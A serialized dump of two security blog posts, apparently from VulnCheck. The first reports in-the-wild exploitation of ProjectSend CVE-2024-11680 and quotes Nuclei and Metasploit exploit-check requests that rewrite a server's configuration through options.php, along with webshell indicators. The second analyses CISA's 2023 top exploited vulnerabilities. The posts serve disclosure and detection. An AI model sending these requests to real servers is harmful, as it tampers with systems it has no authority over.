Although the CVE for this vulnerability was only published today (November 26), the ",[47,60994,33285],{"href":60995,"rel":60996},"https:\u002F\u002Fgithub.com\u002Fprojectsend\u002Fprojectsend\u002Fcommit\u002F193367d937b1a59ed5b68dd4e60bd53317473744",[51]," has been publicly available for over a year (May 16, 2023). Since the patch release, multiple exploits have been published by ",[47,60999,61002],{"href":61000,"rel":61001},"https:\u002F\u002Fwww.synacktiv.com\u002Fsites\u002Fdefault\u002Ffiles\u002F2024-07\u002Fsynacktiv-projectsend-multiple-vulnerabilities.pdf",[51],"Synactiv",[47,61004,61007],{"href":61005,"rel":61006},"https:\u002F\u002Fgithub.com\u002Fprojectdiscovery\u002Fnuclei-templates\u002Fblob\u002Fmain\u002Fhttp\u002Fvulnerabilities\u002Fprojectsend-auth-bypass.yaml",[51],"Project Discovery"," (Nuclei), and ",[47,61010,33465],{"href":61011,"rel":61012},"https:\u002F\u002Fgithub.com\u002Frapid7\u002Fmetasploit-framework\u002Fblob\u002Fmaster\u002Fmodules\u002Fexploits\u002Flinux\u002Fhttp\u002Fprojectsend_unauth_rce.rb",[51]," (Metasploit). 
The lack of a CVE is an oversight that stands out, particularly given Rapid7’s status as a ",[47,61015,61018],{"href":61016,"rel":61017},"https:\u002F\u002Fwww.cve.org\u002FPartnerInformation\u002FListofPartners",[51],"CNA"," (CVE Numbering Authority) with Researcher and Open Source scope.",[61,61021,61023],{"id":61022},"vulnerability-timeline","Vulnerability Timeline",[61025,61026],"time-line",{":entries":61027},"[{\"date\":\"January 19, 2023\",\"markdown\":\"Synactiv discloses to ProjectSend\"},{\"date\":\"May 16, 2023\",\"markdown\":\"ProjectSend patches the vulnerability\"},{\"date\":\"July 19, 2024\",\"markdown\":\"Synactiv releases an advisory\"},{\"date\":\"August 3, 2024\",\"markdown\":\"ProjectSend releases the official patch in r1720\"},{\"date\":\"August 30, 2024\",\"markdown\":\"A Metasploit pull request is opened\"},{\"date\":\"September 3, 2024\",\"markdown\":\"A Nuclei pull request is opened\"},{\"date\":\"November 25, 2024\",\"markdown\":\"VulnCheck assigns CVE-2024-11680\"}]",[61,61029,61031],{"id":61030},"exploited-in-the-wild","Exploited in the Wild",[18,61033,61034,61035,4606],{},"VulnCheck noticed that public-facing ProjectSend servers had started to change their landing page titles to long, random-ish strings. Some of the “random” names have larger groupings, for ",[47,61036,27177],{"href":61037,"rel":61038},"https:\u002F\u002Fwww.shodan.io\u002Fsearch?query=title%3A%22Log+in+%26raquo%3B+2nVsqpahM2JlULBOKl4HZg2JMXb%22",[51],[18,61040,61041],{},[68,61042],{":width":10862,"alt":61043,"src":61044},"Victims on Shodan","\u002Fblog\u002Fprojectsend-exploited-itw\u002Fshodan-victims.png",[18,61046,61047],{},"These long and random-ish names are in line with how both Nuclei and Metasploit implement their vulnerability testing logic. 
Both exploit tools modify the victim’s configuration file to alter the sitename (and therefore HTTP title) with a random value.",[18,61049,61050],{},"Nuclei exploit check:",[1354,61052,61056],{"className":61053,"code":61054,"language":61055,"meta":219,"style":219},"language-yaml shiki shiki-themes material-theme-lighter github-light github-dark monokai","- raw:\n    - |\n        POST \u002Foptions.php HTTP\u002F1.1\n        Host: {{Hostname}}\n        Content-Type: application\u002Fx-www-form-urlencoded\n\n        csrf_token={{csrf}}&section=general&this_install_title={{string}}\n","yaml",[886,61057,61058,61068,61076,61081,61086,61091,61095],{"__ignoreMap":219},[1373,61059,61060,61063,61066],{"class":1375,"line":1376},[1373,61061,61062],{"class":1383},"-",[1373,61064,61065],{"class":6300}," raw",[1373,61067,11747],{"class":1383},[1373,61069,61070,61073],{"class":1375,"line":220},[1373,61071,61072],{"class":1383},"    -",[1373,61074,61075],{"class":4636}," |\n",[1373,61077,61078],{"class":1375,"line":1266},[1373,61079,61080],{"class":1391},"        POST \u002Foptions.php HTTP\u002F1.1\n",[1373,61082,61083],{"class":1375,"line":1852},[1373,61084,61085],{"class":1391},"        Host: {{Hostname}}\n",[1373,61087,61088],{"class":1375,"line":4692},[1373,61089,61090],{"class":1391},"        Content-Type: application\u002Fx-www-form-urlencoded\n",[1373,61092,61093],{"class":1375,"line":4724},[1373,61094,6520],{"emptyLinePlaceholder":237},[1373,61096,61097],{"class":1375,"line":4756},[1373,61098,61099],{"class":1391},"        csrf_token={{csrf}}&section=general&this_install_title={{string}}\n",[18,61101,61102],{},"Metasploit exploit check:",[1354,61104,61108],{"className":61105,"code":61106,"language":61107,"meta":219,"style":219},"language-ruby shiki shiki-themes material-theme-lighter github-light github-dark monokai","# Test if the instance is vulnerable by trying to change its title\nparams = {\n    'csrf_token' => csrf_token,\n    'section' => 'general',\n    
'this_install_title' => random_new_title\n}\nres = send_request_cgi({\n    'method' => 'POST',\n    'uri' => normalize_uri(datastore['TARGETURI'], 'options.php'),\n    'keep_cookie' => true,\n    'vars_post' => params\n})\n","ruby",[886,61109,61110,61115,61124,61141,61161,61175,61179,61191,61209,61248,61263,61277],{"__ignoreMap":219},[1373,61111,61112],{"class":1375,"line":1376},[1373,61113,61114],{"class":4630},"# Test if the instance is vulnerable by trying to change its title\n",[1373,61116,61117,61120,61122],{"class":1375,"line":220},[1373,61118,7627],{"class":61119},"s94S9",[1373,61121,8575],{"class":1397},[1373,61123,4765],{"class":1383},[1373,61125,61126,61129,61132,61134,61136,61139],{"class":1375,"line":1266},[1373,61127,61128],{"class":1387},"    '",[1373,61130,61131],{"class":1391},"csrf_token",[1373,61133,1388],{"class":1387},[1373,61135,4986],{"class":1383},[1373,61137,61138],{"class":4640}," csrf_token",[1373,61140,9062],{"class":1383},[1373,61142,61143,61145,61148,61150,61152,61154,61157,61159],{"class":1375,"line":1852},[1373,61144,61128],{"class":1387},[1373,61146,61147],{"class":1391},"section",[1373,61149,1388],{"class":1387},[1373,61151,4986],{"class":1383},[1373,61153,4713],{"class":1387},[1373,61155,61156],{"class":1391},"general",[1373,61158,1388],{"class":1387},[1373,61160,9062],{"class":1383},[1373,61162,61163,61165,61168,61170,61172],{"class":1375,"line":4692},[1373,61164,61128],{"class":1387},[1373,61166,61167],{"class":1391},"this_install_title",[1373,61169,1388],{"class":1387},[1373,61171,4986],{"class":1383},[1373,61173,61174],{"class":4640}," random_new_title\n",[1373,61176,61177],{"class":1375,"line":4724},[1373,61178,1855],{"class":1383},[1373,61180,61181,61183,61185,61188],{"class":1375,"line":4756},[1373,61182,47190],{"class":61119},[1373,61184,8575],{"class":1397},[1373,61186,61187],{"class":7297}," 
send_request_cgi",[1373,61189,61190],{"class":1383},"({\n",[1373,61192,61193,61195,61197,61199,61201,61203,61205,61207],{"class":1375,"line":4768},[1373,61194,61128],{"class":1387},[1373,61196,49218],{"class":1391},[1373,61198,1388],{"class":1387},[1373,61200,4986],{"class":1383},[1373,61202,4713],{"class":1387},[1373,61204,6946],{"class":1391},[1373,61206,1388],{"class":1387},[1373,61208,9062],{"class":1383},[1373,61210,61211,61213,61216,61218,61220,61223,61225,61228,61230,61232,61235,61237,61239,61241,61244,61246],{"class":1375,"line":4792},[1373,61212,61128],{"class":1387},[1373,61214,61215],{"class":1391},"uri",[1373,61217,1388],{"class":1387},[1373,61219,4986],{"class":1383},[1373,61221,61222],{"class":7297}," normalize_uri",[1373,61224,1384],{"class":1383},[1373,61226,61227],{"class":4640},"datastore",[1373,61229,7035],{"class":1383},[1373,61231,1388],{"class":1387},[1373,61233,61234],{"class":1391},"TARGETURI",[1373,61236,1388],{"class":1387},[1373,61238,27625],{"class":1383},[1373,61240,4713],{"class":1387},[1373,61242,61243],{"class":1391},"options.php",[1373,61245,1388],{"class":1387},[1373,61247,17933],{"class":1383},[1373,61249,61250,61252,61255,61257,61259,61261],{"class":1375,"line":4798},[1373,61251,61128],{"class":1387},[1373,61253,61254],{"class":1391},"keep_cookie",[1373,61256,1388],{"class":1387},[1373,61258,4986],{"class":1383},[1373,61260,14986],{"class":14985},[1373,61262,9062],{"class":1383},[1373,61264,61265,61267,61270,61272,61274],{"class":1375,"line":4806},[1373,61266,61128],{"class":1387},[1373,61268,61269],{"class":1391},"vars_post",[1373,61271,1388],{"class":1387},[1373,61273,4986],{"class":1383},[1373,61275,61276],{"class":4640}," params\n",[1373,61278,61279],{"class":1375,"line":4817},[1373,61280,9809],{"class":1383},[18,61282,61283],{},"This is a very heavy-handed “test” (although in Metasploit’s defense, they at least try to restore the original value) and not something any “researcher” should actually be doing. 
This is especially true because the application's publication date is embedded right in the landing page, meaning you can determine whether a vulnerable version is in use without exploiting the target at all. Regardless, these random titles started to appear in September, just as the Metasploit and Nuclei exploits were made public.",[18,61285,61286],{},[68,61287],{":width":10862,"alt":61288,"src":61289},"Victims over time","\u002Fblog\u002Fprojectsend-exploited-itw\u002Fshodan-graph.png",[18,61291,61292,61293,61295,61296,61300],{},"While the endpoint might be fairly generic (",[886,61294,61243],{},"), our friends over at ",[47,61297,11029],{"href":61298,"rel":61299},"https:\u002F\u002Fviz.greynoise.io\u002Fquery\u002Fraw_data.web.paths:%22%2Foptions.php%22",[51]," also appear to index more than one hundred IP addresses hitting that URI.",[18,61302,61303],{},[68,61304],{":width":10862,"alt":61305,"src":61306},"Potential attackers on GreyNoise","\u002Fblog\u002Fprojectsend-exploited-itw\u002Fgreynoise-options.png",[18,61308,61309],{},"What’s more concerning is that attackers don’t appear to stop at “testing.” One of the next steps in exploitation involves enabling user registration (a non-default setting) to gain post-authentication privileges. When this setting is activated, the text on the landing page changes to prompt users to register an account. 
An example from a victim site follows (the URL and branding have been blocked out):",[18,61311,61312],{},[68,61313],{":width":10862,"alt":61314,"src":61315},"Victim with registration enabled","\u002Fblog\u002Fprojectsend-exploited-itw\u002Fregistration-enabled.png",[18,61317,61318],{},"Given how widespread we are seeing this setting enabled, we think this is likely a bigger problem than “researchers intrusively checking for vulnerable versions.” We are likely in the “attackers installing webshells” territory (technically, the vulnerability also allows the attacker to embed malicious JavaScript, which could be an interesting and different attack scenario).",[18,61320,61321,61322,61325,61326,59],{},"If an attacker has uploaded a webshell, it can be found in a predictable location in ",[886,61323,61324],{},"upload\u002Ffiles\u002F"," under the webroot. The files are assigned a predictable name that might help identify exploit timelines as well: ",[886,61327,61328],{},"{posix timestamp of upload}-{sha1 username}-{original file name}.{original extension}",[18,61330,61331],{},[68,61332],{":width":10862,"alt":61333,"src":61334},"Webshell on disk","\u002Fblog\u002Fprojectsend-exploited-itw\u002Fwebshell.png",[18,61336,61337,61338,61340],{},"Additionally, these files are not meant to be accessed directly: downloads are intended to go through an entirely different endpoint. Reviewing the server access logs for direct requests to ",[886,61339,61324],{}," will likely be useful in determining whether exploitation occurred.",[61,61342,61344],{"id":61343},"patch-adoption","Patch Adoption",[18,61346,61347],{},[68,61348],{":width":10862,"alt":61333,"src":61349},"\u002Fblog\u002Fprojectsend-exploited-itw\u002Fvulnerable-piechart.png",[18,61351,61352,61353,61357],{},"The VulnCheck Initial Access team developed a scanner to fingerprint the versions of internet-facing systems. 
Using the ",[47,61354,41731],{"href":61355,"rel":61356},"https:\u002F\u002Fwww.shodan.io\u002Fsearch?query=title%3A%22%26raquo%3B%22+%2B%22Set-Cookie%3A+PHPSESSID%22+html%3A%22ckeditor.js%22",[51]," data, we found that 55% are running r1605 (released October 2022), 44% are running an unnamed release (released April 2023), and only about 1% are running the patched version, r1750.",[18,61359,61360],{},"Given the timeline, evidence of exploitation, and lack of patch adoption, we assume that exploitation is likely widespread. And if not now, then in the near future considering the abysmal patching rates.",[61,61362,1903],{"id":1902},[18,61364,61365],{},"The ProjectSend vulnerability, now identified as CVE-2024-11680, has been publicly known for some time. A patch was released on May 16, 2023, and various exploits have been available for months. However, due to the absence of a CVE assignment, centralized documentation was lacking. With the CVE now assigned and evidence of ongoing exploitation, it is crucial for security companies to assess their customers' exposure, implement necessary remediations, and conduct incident response activities as needed.",[61,61367,202],{"id":201},[18,61369,53821,61370,1246,61373,1255,61376],{},[47,61371,40447],{"href":53829,"rel":61372},[51],[47,61374,55229],{"href":53837,"rel":61375},[51],[47,61377,22211],{"href":53842,"rel":61378},[51],[18,61380,53846,61381,53850,61384,982,61387,1260],{},[47,61382,1233],{"href":2871,"rel":61383},[51],[47,61385,1245],{"href":45535,"rel":61386},[51],[47,61388,216],{"href":214,"rel":61389},[51],[2901,61391,61392],{},"",{"title":219,"searchDepth":220,"depth":220,"links":61394},[61395,61396,61397,61398,61399],{"id":61022,"depth":220,"text":61023},{"id":61030,"depth":220,"text":61031},{"id":61343,"depth":220,"text":61344},{"id":1902,"depth":220,"text":1903},{"id":201,"depth":220,"text":202},"2024-11-26","VulnCheck discovers evidence that ProjectSend has been exploited in the wild and assigns 
CVE-2024-11680",{"slug":61403},"projectsend-exploited-itw","\u002Fblog\u002Fprojectsend-exploited-itw",{"title":36637,"description":61401},"blog\u002Fprojectsend-exploited-itw",[242,1281,23275,1279],"FfI1Y-zck4-gF82K8cK6kX_mdlHKdPibrzh36aVAhPs",{"id":61410,"title":61411,"articles":61412,"authors":61452,"body":61454,"date":61416,"description":57889,"extension":234,"image":7,"link":7,"meta":62297,"navigation":237,"path":62299,"seo":62300,"series":7,"stem":62301,"subtype":7,"tags":62302,"__hash__":62303},"blog\u002Fblog\u002Fcisa-top-exploited-2024.md","Exploring CISA’s 2023 Top Routinely Exploited Vulnerabilities",[61413,61417,61419,61421,61423,61425,61427,61429,61431,61434,61439,61442,61445,61448],{"title":61414,"source":19479,"link":61415,"date":61416},"Zero Days Top Cybersecurity Agencies' Most-Exploited List","https:\u002F\u002Fwww.bankinfosecurity.com\u002Fzero-days-top-cybersecurity-agencies-most-exploited-list-a-26884","2024-11-22",{"title":61414,"source":32210,"link":61418,"date":61416},"https:\u002F\u002Fwww.careersinfosecurity.com\u002Fzero-days-top-cybersecurity-agencies-most-exploited-list-a-26884",{"title":61414,"source":32213,"link":61420,"date":61416},"https:\u002F\u002Fwww.cuinfosecurity.com\u002Fzero-days-top-cybersecurity-agencies-most-exploited-list-a-26884",{"title":61414,"source":32216,"link":61422,"date":61416},"https:\u002F\u002Fwww.databreachtoday.com\u002Fzero-days-top-cybersecurity-agencies-most-exploited-list-a-26884",{"title":61414,"source":32219,"link":61424,"date":61416},"https:\u002F\u002Fwww.fraudtoday.io\u002Fzero-days-top-cybersecurity-agencies-most-exploited-list-a-26884",{"title":61414,"source":32222,"link":61426,"date":61416},"https:\u002F\u002Fwww.govinfosecurity.com\u002Fzero-days-top-cybersecurity-agencies-most-exploited-list-a-26884",{"title":61414,"source":32225,"link":61428,"date":61416},"https:\u002F\u002Fwww.healthcareinfosecurity.com\u002Fzero-days-top-cybersecurity-agencies-most-exploited-list-a-26884",{"title":61414,"sou
rce":32228,"link":61430,"date":61416},"https:\u002F\u002Fwww.inforisktoday.com\u002Fzero-days-top-cybersecurity-agencies-most-exploited-list-a-26884",{"title":61432,"source":14378,"link":61433,"date":61416},"400,000 Systems Potentially Exposed to 2023’s Most Exploited Flaws","https:\u002F\u002Fwww.securityweek.com\u002F400000-systems-potentially-exposed-to-2023s-most-exploited-flaws\u002F",{"title":61435,"source":61436,"link":61437,"date":61438},"Risky Biz News: Four PR firms are behind a Chinese propaganda network","Risky Biz News","https:\u002F\u002Fnews.risky.biz\u002Frisky-biz-news-four-pr-firms-are-behind-a-chinese-propaganda-network\u002F","2024-11-25",{"title":61440,"source":11233,"link":61441,"date":61438},"More than 400K devices vulnerable to most exploited flaws","https:\u002F\u002Fwww.scworld.com\u002Fbrief\u002Fmore-than-400k-devices-vulnerable-to-most-exploited-flaws",{"title":61443,"source":14382,"link":61444,"date":61400},"CISA Urges Agencies to Patch Critical \"Array Networks\" Flaw Amid Active Attacks","https:\u002F\u002Fthehackernews.com\u002F2024\u002F11\u002Fcisa-urges-agencies-to-patch-critical.html",{"title":61446,"source":11233,"link":61447,"date":60926},"Critical Array Networks flaw added to CISA vulnerabilities catalog","https:\u002F\u002Fwww.scworld.com\u002Fbrief\u002Fcritical-array-networks-flaw-added-to-cisa-vulnerabilities-catalog-1",{"title":61449,"source":61450,"link":61451,"date":60948},"CISA Urges Immediate Fix for Critical Array Networks Flaw","CySecurity News","https:\u002F\u002Fwww.cysecurity.news\u002F2024\u002F11\u002Fcisa-urges-immediate-fix-for-critical.html?m=1",[61453],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":61455,"toc":62284},[61456,61459,61462,61464,61481,61485,61488,61493,61496,61504,61508,61511,61515,61523,61527,61530,61533,61539,61542,61545,61548,61601,61605,61608,61611,61629,62154,62158,62161,62266,62270,62273,62275,62277,62279],[18,61457,61458],{},"The CISA top routinely exploited 
vulnerabilities report is always a good read. While it's pretty late in the year, it offers a unique opportunity to reflect on the previous year’s exploitation trends and understand which vulnerabilities posed the greatest threats in 2023 to government organizations. Each year, the report sparks questions about why certain vulnerabilities made the list and what makes them particularly significant.",[18,61460,61461],{},"This year, we decided to explore the vulnerabilities that top CISA's list using VulnCheck Intelligence to better understand the impact and threats associated with these vulnerabilities and the detection coverage VulnCheck provides defenders.",[1920,61463,20],{"id":3520},[22,61465,61466,61469,61472,61475,61478],{},[25,61467,61468],{},"Exploit Availability: 14 of 15 CVEs in CISA's 2023 report have 8+ POC exploits; 13 have weaponized exploits, with 5 weaponized before any public evidence of exploitation.",[25,61470,61471],{},"Threat Actor Activity: 60 named threat actors linked to 13 CVEs; North Korea’s Silent Chollima targeted 9, while Log4j (CVE-2021-44228) is linked to the most threat actors.",[25,61473,61474],{},"Detection Coverage: VulnCheck provides Initial Access artifacts for 12 CVEs, enabling visibility into vulnerable hosts and detection of malicious activity.",[25,61476,61477],{},"Host Exposure: Tens of thousands of potentially vulnerable hosts identified.",[25,61479,61480],{},"CISA’s 2023 Top Routinely Exploited Vulnerabilities report is consistent with our research, which demonstrates clear exploit availability and threat actor activity for the listed CVEs.",[61,61482,61484],{"id":61483},"exploit-proof-of-conceptspoc-availability","Exploit Proof-of-Concept (POC) Availability",[18,61486,61487],{},"We already know the vulnerabilities in the report have confirmed exploitation. 
Next, we thought it would be valuable to examine exploit availability for the CVEs in CISA's report.",[18,61489,61490],{},[68,61491],{"alt":58618,"src":61492,"width":28205},"\u002Fblog\u002Fcisa-top-exploited-2024\u002Fcisa-top-pocs.png",[993,61494,60799],{"id":61495},"exploit-availability",[22,61497,61498,61501],{},[25,61499,61500],{},"14 out of 15 CVEs have 8 or more proof-of-concept (POC) exploits available. (For context, out of all CVEs, only 1,658 have 8 or more POC exploits available, so reaching that threshold is itself a signal of significant threat.)",[25,61502,61503],{},"For these 14 CVEs, at least one POC was accessible before or on the same day the first evidence of exploitation was publicly disclosed.",[993,61505,61507],{"id":61506},"the-exception","The Exception",[18,61509,61510],{},"The primary outlier is the Barracuda Email Security Gateway (ESG) CVE. Caitlin Condon pointed out a POC that was posted by the Rapid7 team, which we’ve included. This case stands out because Barracuda effectively EOL’d (end-of-lifed) the device after widespread compromise. It’s a rare example of a vendor deciding to discontinue a product line after significant exploitation.",[993,61512,61514],{"id":61513},"weaponized-exploits","Weaponized Exploits",[22,61516,61517,61520],{},[25,61518,61519],{},"13 out of 15 CVEs have weaponized exploits available.",[25,61521,61522],{},"Of these, 5 weaponized exploits were available before any public evidence of exploitation.",[993,61524,61526],{"id":61525},"what-do-we-mean-by-weaponized-exploits","What Do We Mean by “Weaponized Exploits”?",[18,61528,61529],{},"A weaponized exploit refers to an exploit that is explicitly malicious, such as cases where the exploit is contained within malware (e.g., a malicious Microsoft Word document), or facilitates \"point & click\" exploitation (e.g., works against all or most targets and works reliably, such as exploits in Metasploit, VulnCheck Initial Access Intelligence, CANVAS, or Core Impact). 
Additionally, weaponized exploits typically have secondary payloads, droppers, or implants.",[61,61531,45021],{"id":61532},"threat-actor-attribution",[18,61534,61535],{},[68,61536],{"alt":58618,"src":61537,"width":61538},"\u002Fblog\u002Fcisa-top-exploited-2024\u002Fcisa-threat-actors.png",1000,[18,61540,61541],{},"We identified 60 named threat actors associated with at least one of the CVEs in CISA’s 2023 list. 13 out of 15 CVEs in the report have named threat actors tied to them. The two CVEs without a threat actor attributed were associated with OwnCloud GraphAPI and Barracuda ESG. Additionally, we noted five more associations where the origin country was identified, but the specific threat actor was not named which we included in the chart.",[18,61543,61544],{},"Among the threat actors, North Korea’s Silent Chollima stands out, targeting 9 out of 15 CVEs in the report. Not surprisingly, the Log4j CVE (CVE-2021-44228) is associated with the most threat actors overall, with 31 named threat actors linked to its exploitation.",[18,61546,61547],{},"A quick breakdown of threat actor activity by country shows the usual suspects including: China, Russia, Iran, and North Korea with a single threat actor tied to Turkey. 
Here’s how the number of threat actors stacks up by country:",[307,61549,61550,61559],{},[310,61551,61552],{},[313,61553,61554,61556],{},[316,61555,1464],{},[316,61557,61558],{},"# of Threat Actors",[336,61560,61561,61567,61574,61581,61587,61594],{},[313,61562,61563,61565],{},[341,61564,28799],{},[341,61566,36914],{},[313,61568,61569,61572],{},[341,61570,61571],{},"China",[341,61573,28534],{},[313,61575,61576,61579],{},[341,61577,61578],{},"Russia",[341,61580,723],{},[313,61582,61583,61585],{},[341,61584,930],{},[341,61586,37681],{},[313,61588,61589,61592],{},[341,61590,61591],{},"North Korea",[341,61593,491],{},[313,61595,61596,61599],{},[341,61597,61598],{},"Turkey",[341,61600,467],{},[61,61602,61604],{"id":61603},"detecting-exploitation-w-vulncheck-initial-access","Detecting Exploitation w\u002F VulnCheck Initial Access",[18,61606,61607],{},"Out of the 15 CVEs highlighted in CISA's 2023 report, 12 have VulnCheck Initial Access artifacts, which demonstrates our commitment to ensuring broad coverage of vulnerabilities that are exploited in the wild or likely to become so. These artifacts provide defenders with visibility into potential vulnerability exposures. 
They also aid in detecting the malicious use of exploits targeting these vulnerabilities within an organization’s environment.",[18,61609,61610],{},"For each CVE, we provide a range of detection tools including:",[22,61612,61613,61615,61617,61619,61621,61623,61625,61627],{},[25,61614,325],{},[25,61616,59440],{},[25,61618,59443],{},[25,61620,59446],{},[25,61622,59449],{},[25,61624,59452],{},[25,61626,59455],{},[25,61628,59458],{},[307,61630,61631,61658],{},[310,61632,61633],{},[313,61634,61635,61638,61640,61642,61644,61647,61649,61652,61655],{},[316,61636,61637],{},"artifactName",[316,61639,59474],{},[316,61641,242],{},[316,61643,22852],{},[316,61645,61646],{},"versionScanner",[316,61648,59485],{},[316,61650,61651],{},"suricataRule",[316,61653,61654],{},"snortRule",[316,61656,61657],{},"yara",[336,61659,61660,61683,61706,61729,61752,61775,61798,61821,61844,61867,61890,61913,61936,61957,61979,62001,62022,62044,62066,62088,62110,62132],{},[313,61661,61662,61665,61668,61671,61673,61675,61677,61679,61681],{},[341,61663,61664],{},"ManageEngine SAML Transform Code Execution",[341,61666,61667],{},"2023-01-19",[341,61669,61670],{},"CVE-2022-47966",[341,61672,59510],{},[341,61674],{},[341,61676,59510],{},[341,61678,59510],{},[341,61680,59510],{},[341,61682,59510],{},[313,61684,61685,61688,61691,61694,61696,61698,61700,61702,61704],{},[341,61686,61687],{},"PaperCut NG\u002FMF Authentication Bypass and Code Execution",[341,61689,61690],{},"2023-04-24",[341,61692,61693],{},"CVE-2023-27350",[341,61695,59510],{},[341,61697,59510],{},[341,61699,59510],{},[341,61701,59510],{},[341,61703,59510],{},[341,61705],{},[313,61707,61708,61711,61714,61717,61719,61721,61723,61725,61727],{},[341,61709,61710],{},"Progress MOVEit Transfer SQL Injection 
(guestaccess.aspx)",[341,61712,61713],{},"2023-06-05",[341,61715,61716],{},"CVE-2023-34362",[341,61718,59510],{},[341,61720,59510],{},[341,61722,59510],{},[341,61724,59510],{},[341,61726,59510],{},[341,61728,59510],{},[313,61730,61731,61734,61737,61740,61742,61744,61746,61748,61750],{},[341,61732,61733],{},"Fortigate SSL VPN enc Heap Overflow",[341,61735,61736],{},"2023-07-11",[341,61738,61739],{},"CVE-2023-27997",[341,61741],{},[341,61743],{},[341,61745],{},[341,61747],{},[341,61749],{},[341,61751],{},[313,61753,61754,61757,61760,61763,61765,61767,61769,61771,61773],{},[341,61755,61756],{},"Citrix NetScaler Stack-Based Buffer Overflow",[341,61758,61759],{},"2023-08-14",[341,61761,61762],{},"CVE-2023-3519",[341,61764,59510],{},[341,61766,59510],{},[341,61768,59510],{},[341,61770,59510],{},[341,61772,59510],{},[341,61774,59510],{},[313,61776,61777,61780,61783,61786,61788,61790,61792,61794,61796],{},[341,61778,61779],{},"JetBrains TeamCity Authentication Bypass",[341,61781,61782],{},"2023-09-27",[341,61784,61785],{},"CVE-2023-42793",[341,61787,59510],{},[341,61789,59510],{},[341,61791,59510],{},[341,61793,59510],{},[341,61795,59510],{},[341,61797,59510],{},[313,61799,61800,61803,61806,61809,61811,61813,61815,61817,61819],{},[341,61801,61802],{},"Confluence Setup Reset Vulnerability",[341,61804,61805],{},"2023-10-10",[341,61807,61808],{},"CVE-2023-22515",[341,61810,59510],{},[341,61812,59510],{},[341,61814,59510],{},[341,61816,59510],{},[341,61818,59510],{},[341,61820],{},[313,61822,61823,61826,61829,61832,61834,61836,61838,61840,61842],{},[341,61824,61825],{},"Cisco IOS XE Add Admin User",[341,61827,61828],{},"2023-10-16",[341,61830,61831],{},"CVE-2023-20198",[341,61833,59510],{},[341,61835],{},[341,61837,59510],{},[341,61839,59510],{},[341,61841,59510],{},[341,61843],{},[313,61845,61846,61849,61852,61855,61857,61859,61861,61863,61865],{},[341,61847,61848],{},"Citrix NetScaler Information Disclosure (Memory 
Leak)",[341,61850,61851],{},"2023-10-25",[341,61853,61854],{},"CVE-2023-4966",[341,61856,59510],{},[341,61858],{},[341,61860,59510],{},[341,61862,59510],{},[341,61864,59510],{},[341,61866],{},[313,61868,61869,61872,61875,61878,61880,61882,61884,61886,61888],{},[341,61870,61871],{},"Cisco IOS XE IPv6 Command Injection",[341,61873,61874],{},"2023-11-02",[341,61876,61877],{},"CVE-2023-20273",[341,61879,59510],{},[341,61881],{},[341,61883,59510],{},[341,61885,59510],{},[341,61887,59510],{},[341,61889],{},[313,61891,61892,61895,61898,61901,61903,61905,61907,61909,61911],{},[341,61893,61894],{},"ownCloud graphapi Information Disclosure",[341,61896,61897],{},"2023-12-06",[341,61899,61900],{},"CVE-2023-49103",[341,61902,59510],{},[341,61904],{},[341,61906,59510],{},[341,61908,59510],{},[341,61910,59510],{},[341,61912],{},[313,61914,61915,61918,61921,61924,61926,61928,61930,61932,61934],{},[341,61916,61917],{},"Apache Skywalking Log4Shell",[341,61919,61920],{},"2023-12-11",[341,61922,61923],{},"CVE-2021-44228",[341,61925],{},[341,61927,59510],{},[341,61929],{},[341,61931],{},[341,61933],{},[341,61935],{},[313,61937,61938,61941,61943,61945,61947,61949,61951,61953,61955],{},[341,61939,61940],{},"ManageEngine ADManager Log4Shell",[341,61942,61920],{},[341,61944,61923],{},[341,61946],{},[341,61948,59510],{},[341,61950],{},[341,61952],{},[341,61954],{},[341,61956],{},[313,61958,61959,61962,61965,61967,61969,61971,61973,61975,61977],{},[341,61960,61961],{},"Apache Struts2 If-Modified-Since Header Log4Shell",[341,61963,61964],{},"2022-11-23",[341,61966,61923],{},[341,61968,59510],{},[341,61970],{},[341,61972,59510],{},[341,61974,59510],{},[341,61976,59510],{},[341,61978,59510],{},[313,61980,61981,61984,61987,61989,61991,61993,61995,61997,61999],{},[341,61982,61983],{},"Apache Struts2 URI 
Log4Shell",[341,61985,61986],{},"2022-11-25",[341,61988,61923],{},[341,61990,59510],{},[341,61992],{},[341,61994,59510],{},[341,61996,59510],{},[341,61998,59510],{},[341,62000,59510],{},[313,62002,62003,62006,62008,62010,62012,62014,62016,62018,62020],{},[341,62004,62005],{},"Ubiquiti UniFi Controller Authentication Log4Shell",[341,62007,61986],{},[341,62009,61923],{},[341,62011,59510],{},[341,62013,59510],{},[341,62015,59510],{},[341,62017,59510],{},[341,62019,59510],{},[341,62021,59510],{},[313,62023,62024,62027,62030,62032,62034,62036,62038,62040,62042],{},[341,62025,62026],{},"Apache JSPWiki URI Log4Shell",[341,62028,62029],{},"2022-11-28",[341,62031,61923],{},[341,62033,59510],{},[341,62035,59510],{},[341,62037,59510],{},[341,62039,59510],{},[341,62041,59510],{},[341,62043,59510],{},[313,62045,62046,62049,62052,62054,62056,62058,62060,62062,62064],{},[341,62047,62048],{},"Apache OFBiz Visitor Cookie Log4Shell",[341,62050,62051],{},"2022-11-30",[341,62053,61923],{},[341,62055,59510],{},[341,62057,59510],{},[341,62059,59510],{},[341,62061,59510],{},[341,62063,59510],{},[341,62065,59510],{},[313,62067,62068,62071,62074,62076,62078,62080,62082,62084,62086],{},[341,62069,62070],{},"Apache Druid HTTP DELETE Log4Shell",[341,62072,62073],{},"2022-12-01",[341,62075,61923],{},[341,62077,59510],{},[341,62079,59510],{},[341,62081,59510],{},[341,62083,59510],{},[341,62085,59510],{},[341,62087,59510],{},[313,62089,62090,62093,62096,62098,62100,62102,62104,62106,62108],{},[341,62091,62092],{},"Apache James POP3 Authentication Log4Shell",[341,62094,62095],{},"2022-12-02",[341,62097,61923],{},[341,62099,59510],{},[341,62101,59510],{},[341,62103,59510],{},[341,62105,59510],{},[341,62107,59510],{},[341,62109,59510],{},[313,62111,62112,62115,62118,62120,62122,62124,62126,62128,62130],{},[341,62113,62114],{},"Apache James SMTP Mail From 
